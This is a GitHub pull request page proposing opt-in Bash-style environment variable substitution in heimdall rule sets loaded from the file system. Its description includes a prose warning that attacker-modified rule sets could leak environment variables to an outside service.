feat: Support of env variables in rule sets loaded by the file_system
provider using Bash syntax
#775
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Related issue(s)
closes #777
Checklist
Description
This PR enables access to environment variables from rule sets using Bash syntax (same way as this is already possible in the static configuration file) loaded by the
file_system
provider. By default this feature is disabled and if required enabled by making use of the newenv_vars_enabled
property, like e.g. shown below.WARNING: All environment variables, used in the rule set files must be known in advance to the heimdall process (when it starts). In addition, the usage of that functionality might lead to security issues. If an adversary is somehow able to add new or update existing rule sets, it would be theoretically able exfiltrating environment variables available to the heimdall process by crafting contextualizers or authorizers, which would forward the corresponding values to a controlled service. So, use with caution, disable the watching of rule set updates and try to avoid!
Usage example in a rule set:
Here, the rule with the id
rule:1
defines the host to be used for request forwarding using theUPSTREAM_HOST
environment variable. If this variable is not set or is empty, the valuedefault-backend:8080
is used instead.